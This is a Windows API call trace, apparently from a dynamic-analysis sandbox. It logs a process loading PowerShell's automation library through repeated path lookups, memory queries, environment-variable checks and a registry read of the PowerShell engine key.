	[0147.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.820] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0147.826] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.951] CoTaskMemFree (pv=0x23ecf0) 
	[0147.956] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0147.965] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.965] CoTaskMemFree (pv=0x23ecf0) 
	[0147.967] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.967] CoTaskMemFree (pv=0x23ecf0) 
	[0147.971] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.971] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.971] CoTaskMemFree (pv=0x23ecf0) 
	[0147.979] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.979] CoTaskMemFree (pv=0x23ecf0) 
	[0148.098] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0148.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0148.098] CoTaskMemFree (pv=0x23ecf0) 
	[0148.100] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0148.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0148.100] CoTaskMemFree (pv=0x23ecf0) 
	[0148.104] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.106] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.234] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0148.245] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0148.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0148.245] CoTaskMemFree (pv=0x23ecf0) 
	[0148.525] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x23f130
	[0148.527] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x23f240
	[0149.008] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.265] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.268] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.269] VirtualQuery (in: lpAddress=0x1ca1c0, lpBuffer=0x1cb080, dwLength=0x30 | out: lpBuffer=0x1cb080*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.385] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.386] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.387] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.387] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.388] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.389] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.390] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.391] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.392] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.392] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.392] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.392] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.392] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.392] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.392] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.393] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.393] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.393] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.393] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.393] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.393] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.393] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.393] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.393] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.393] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.394] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.394] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.394] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.394] VirtualQuery (in: lpAddress=0x1cb770, lpBuffer=0x1cc630, dwLength=0x30 | out: lpBuffer=0x1cc630*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.397] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0149.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.397] CoTaskMemFree (pv=0x23f350) 
	[0149.450] CoTaskMemAlloc (cb=0x104) returned 0x23f350
	[0149.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.450] CoTaskMemFree (pv=0x23f350) 
	[0149.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.732] VirtualQuery (in: lpAddress=0x1cba20, lpBuffer=0x1cc8e0, dwLength=0x30 | out: lpBuffer=0x1cc8e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.738] VirtualQuery (in: lpAddress=0x1cba20, lpBuffer=0x1cc8e0, dwLength=0x30 | out: lpBuffer=0x1cc8e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.738] VirtualQuery (in: lpAddress=0x1cb270, lpBuffer=0x1cc130, dwLength=0x30 | out: lpBuffer=0x1cc130*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.738] VirtualQuery (in: lpAddress=0x1cb270, lpBuffer=0x1cc130, dwLength=0x30 | out: lpBuffer=0x1cc130*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.739] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd878 | out: phkResult=0x1cd878*=0x3a4) returned 0x0
	[0149.739] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd7fc, lpData=0x0, lpcbData=0x1cd7f8*=0x0 | out: lpType=0x1cd7fc*=0x1, lpData=0x0, lpcbData=0x1cd7f8*=0x56) returned 0x0
